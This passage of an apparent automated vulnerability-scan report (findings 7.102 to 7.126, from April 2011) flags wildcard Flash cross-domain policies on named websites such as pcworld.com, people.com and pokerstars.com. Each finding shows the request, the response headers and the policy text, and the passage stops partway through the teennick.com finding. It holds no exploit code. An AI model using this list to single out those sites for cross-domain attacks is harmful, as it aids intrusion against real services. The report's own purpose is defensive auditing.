7.102. http://www.opportunity.co/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opportunity.co
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opportunity.co

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Feb 2011 03:06:57 GMT
ETag: "48c0006-c3-f11a7640"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.103. http://www.outdoorchannel.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outdoorchannel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.outdoorchannel.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Last-Modified: Fri, 27 Aug 2010 15:20:56 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:07:28 GMT
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.outdoorchannel.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=8b192145-0a99-4adb-8be8-ad64d5a6e8cd; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/
Content-Length: 208
Connection: close
Via: 1.1 AN-0016020121270012

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.104. http://www.pcworld.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"194-1297458026000"
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Content-Type: application/xml
Content-Length: 194
Date: Sat, 02 Apr 2011 14:10:44 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.105. http://www.people.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.people.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:25 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.106. http://www.peoplestylewatch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.peoplestylewatch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:32 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.107. http://www.pittsburghlive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pittsburghlive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pittsburghlive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:01 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Last-Modified: Mon, 24 Jan 2011 21:35:59 GMT
Accept-Ranges: bytes
Content-Length: 455
Vary: Accept-Encoding,User-agent
Connection: close
Content-Type: text/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
       <site-control permitted-cross-domain-poli
...[SNIP]...
<allow-access-from domain="*" />
       <allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abacast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pittsburghlive.com"/>
...[SNIP]...

7.108. http://www.playfin.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.playfin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playfin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT
ETag: "1cf1115-c6-49c83001704c0"
Accept-Ranges: bytes
Content-Length: 198
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.109. http://www.pokerstars.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pokerstars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pokerstars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:55 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 19:43:06 GMT
ETag: "5af-ece20680"
Accept-Ranges: bytes
Content-Length: 1455
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pokerstarsblog.com"/>
<allow-access-from domain="*.pokerstars.com"/>
<allow-access-from domain="*.pokerstars.pl"/>
<allow-access-from domain="*.pokerstars.es"/>
<allow-access-from domain="*.pokerstars.fi"/>
<allow-access-from domain="*.pokerstars.hu"/>
<allow-access-from domain="*.pokerstars.nl"/>
<allow-access-from domain="*.pokerstars.se"/>
<allow-access-from domain="*.pokerstars.co.uk"/>
<allow-access-from domain="*.pokerstars.it"/>
<allow-access-from domain="*.pokerstars.si"/>
<allow-access-from domain="*.pokerstars.pt"/>
<allow-access-from domain="*.pokerstars.cz"/>
<allow-access-from domain="*.appt.com"/>
<allow-access-from domain="*.europeanpokertour.com"/>
<allow-access-from domain="*.wcoop.com"/>
<allow-access-from domain="*.pokerstars.tv"/>
<allow-access-from domain="*.joehachem.com"/>
<allow-access-from domain="*.chrismoneymaker.com"/>
<allow-access-from domain="*.greg-raymer.net"/>
<allow-access-from domain="*.andre-akkari.com"/>
<allow-access-from domain="*.danielnegreanu.ca"/>
<allow-access-from domain="*.hevad-khan.com"/>
<allow-access-from domain="*.lee-nelson.net"/>
<allow-access-from domain="*.vanessa-rousso.net"/>
<allow-access-from domain="*"/>
...[SNIP]...

7.110. http://www.popularscreensavers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popularscreensavers.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
ETag: W/"241-1301508774000"
Last-Modified: Wed, 30 Mar 2011 18:12:54 GMT
Content-Length: 241
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
<allow-access-from domain="*"/>
...[SNIP]...

7.111. http://www.rawtube.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rawtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rawtube.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 May 2009 01:35:39 GMT
ETag: "820f-13b-469c13a9090c0"
Content-Type: text/xml
Content-Length: 315
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:31 GMT
X-Varnish: 863747465 862901038
Age: 3296
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.112. http://www.realsimple.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realsimple.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
Last-Modified: Tue, 06 Oct 2009 18:54:33 GMT
ETag: "2158b86-16c-47548c2caac40"
Accept-Ranges: bytes
Content-Length: 364
Content-Type: application/xml
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*.redcated" />
<allow-access-from domain="*.atlassolutions.com" />
<allow-access-from domain="*.akamai.net" />
...[SNIP]...

7.113. http://www.redorbit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redorbit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.redorbit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:39 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 15:00:52 GMT
Accept-Ranges: bytes
Content-Length: 208
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.114. http://www.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:110f"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:44:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

7.115. http://www.sendspace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sendspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sendspace.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
ETag: "1797000725"
Last-Modified: Fri, 01 Apr 2011 07:15:01 GMT
Content-Length: 115
Connection: close
Date: Sat, 02 Apr 2011 14:08:28 GMT
Server: Apache

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.116. http://www.sfgate.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sfgate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:16 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751796195568; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Tue, 09 Jan 2007 23:06:08 GMT
ETag: "4d737b-cb-426a397623678"
Accept-Ranges: bytes
Content-Length: 203
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.117. http://www.sheknows.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sheknows.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sheknows.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:25 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
X-Served-By: app3v-sk.wuo.lax2
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.118. http://www.shockwave.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shockwave.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shockwave.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Last-Modified: Wed, 25 Feb 2009 04:02:39 GMT
ETag: "11d7972a2-109-463b64e7f35c0"
Accept-Ranges: bytes
Content-Length: 265
Content-Type: application/xml
Cache-Control: max-age=624
Expires: Sat, 02 Apr 2011 13:55:06 GMT
Date: Sat, 02 Apr 2011 13:44:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.nick.com" secure="true" />
...[SNIP]...

7.119. http://www.slideshare.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slideshare.net

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 18:28:13 GMT
Expires: Sun, 03 Apr 2011 12:32:11 GMT
Cache-Control: max-age=86400
Content-Length: 222
Date: Sat, 02 Apr 2011 13:37:27 GMT
X-Varnish: 2056362629 2055719298
Age: 3916
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />

...[SNIP]...

7.120. http://www.spike.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spike.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Last-Modified: Wed, 23 Jun 2010 15:37:40 GMT
ETag: "5db0a-102-489b4516c1900"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:31:39 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:39 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.121. http://www.sportsnetwork.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sportsnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sportsnetwork.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:06 GMT
Date: Sat, 02 Apr 2011 13:43:06 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 20 Jul 2009 16:18:35 GMT
ETag: "d2a1a8bb559ca1:160a"
Content-Length: 202

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.122. http://www.swagbucks.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swagbucks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.swagbucks.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/xml
Last-Modified: Thu, 11 Jun 2009 18:44:34 GMT
Accept-Ranges: bytes
ETag: "48a15aac4eac91:4dd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!--http://www.swagbucks.com/content/flash/crossdomain.xml-->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.123. http://www.syfy.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.syfy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.syfy.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.12.2
Last-Modified: Mon, 14 Sep 2009 16:36:06 GMT
ETag: "9c9dd1-a3-4738c4325a980"
Accept-Ranges: bytes
Content-Length: 163
Content-Type: application/xml
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:11:19 GMT
Date: Sat, 02 Apr 2011 14:06:19 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 14:06:19 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!-- !!!syfy!!! http://blog.scifi.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-policy>

7.124. http://www.tampabay.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tampabay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tampabay.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 13:39:21 GMT
Content-Type: text/xml
Connection: close
Cache-control: public,private
Last-modified: Mon, 23 Jun 2008 21:00:46 GMT
Etag: "52-48600efe"
X-Cacheable: YES
Content-Length: 82
X-Varnish: 380322934 380303585
Age: 283
Via: 1.1 varnish
X-Served-By: varnish-a
X-Cache: HIT
X-Cache-Hits: 2
X-Cache-Backend: default

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.125. http://www.tastebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tastebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tastebook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:10 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 22:16:25 GMT
Accept-Ranges: bytes
Content-Length: 146
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:14:10 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.tastebook.com/w3c/p3p.xml", CP="ALL DSP COR LAW CURa CONi OUR BUS IND PHY ONL UNI PUR COM NAV STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.126. http://www.teennick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teennick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

